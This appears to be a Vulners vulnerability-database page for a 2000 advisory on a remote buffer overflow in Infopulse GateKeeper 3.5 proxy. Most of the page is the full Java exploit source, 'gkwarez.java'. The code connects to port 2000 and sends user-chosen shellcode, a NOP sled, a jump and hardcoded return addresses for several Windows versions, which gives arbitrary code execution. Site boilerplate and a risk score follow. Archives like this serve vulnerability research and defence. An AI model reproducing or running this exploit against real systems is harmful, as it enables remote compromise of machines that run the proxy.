Vulners
Lucene search
Infopulse GateKeeper 3.5 - Remote Buffer Overflow
source: https://www.securityfocus.com/bid/1477/info
Infopulse GateKeeper proxy server will crash if a string containing over 4096 characters is entered through port 2000. Arbitrary code execution is possible. Restarting the server is required in order to regain normal functionality.
/* gkwarez.java by Andrew Lewis aka. Wizdumb
* <[email protected] || www.mdma.za.net || wizdumb@IRC>
*
* Remote exploit for Gatekeeper Proxy Server 3.5 (and prior versions?).
* Written as proof of concept code only - the MDMA crew do not condone
* illegal activities in any way what-so-ever.
*
* This code is now public - Gatekeeper version 3.6 is out. :-)
*
* Shellcode is handled plug and play style for flexibility and defence
* against script kiddies. :) Oh, and coz I'm too dumb to make some and too
* lazy to find some. :P Also note that nulls in your shellcode are fine for
* this daemon - just beware of terminating newlines.
*
* Greetz to everyone in MDMA, USSRLabs, b10z, and BlabberNet's #hack
*/
import java.io.*;
import java.net.*;
class gkwarez {
public static void main(String[] args) throws IOException {
if (args.length != 3) {
System.out.println("Syntax: java gkwarez [host] [shellcode-file] [version]\n");
System.out.println("Shellcode file is code you want to execute on the host");
System.out.println("Valid versions are 95 (Win95), 98 (Win98), 3 (NT4/SP3) and 4 (NT4/SP4)");
System.exit(1); }
int c;
Socket soq = null;
char[] wet = null;
PrintWriter white = null;
BufferedReader hellkode = null;
char nop = 0x90;
char[] jmpcode = { 0xE9, 0xF9, 0xEF, 0x90 };
// Static addys for "call eax" (backwards) - any1 know of more? mail me. :)
char[] retwin95 = { 0x30, 0x11, 0x71, 0x7F };
char[] retwin98 = { 0x7B, 0xFF, 0xF7, 0xBF };
char[] retntsp3 = { 0xC7, 0x5A, 0xFA, 0x77 };
char[] retntsp4 = { 0x5D, 0x63, 0xF7, 0x77 };
try {
switch (Integer.parseInt(args[2])) {
case 95:
wet = retwin95;
break;
case 98:
wet = retwin98;
break;
case 3:
wet = retntsp3;
break;
case 4:
wet = retntsp4;
break;
default:
System.out.println("Version specified invalid: Expecting 95, 98, 3, or 4");
System.exit(1);
break; } } catch (Exception e) {
System.out.println("Version specified invalid: Expecting 95, 98, 3, or 4");
System.exit(1); }
try {
hellkode = new BufferedReader(new FileReader(args[1]));
} catch (Exception e) {
System.out.println("Unable to open file: " + args[1]);
System.exit(1); }
try {
soq = new Socket(args[0], 2000);
white = new PrintWriter(soq.getOutputStream(), true);
} catch (Exception e) {
System.out.println("Problems connecting :-/");
System.exit(1); }
for (int i = 0; i <= 4800; i++) {
if ((c = hellkode.read()) != -1) {
white.write(c);
if (i == 4096) {
System.out.println("Shellcode specified is too big (4095 bytes max). Bailing out...");
System.exit(1); } }
else {
if (i == 4096) {
white.print(jmpcode);
white.print(wet); }
else white.print(nop); } }
white.println();
System.out.println("Payload sent!"); } }Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Jul 2000 00:00Current
7.4High risk
Vulners AI Score7.4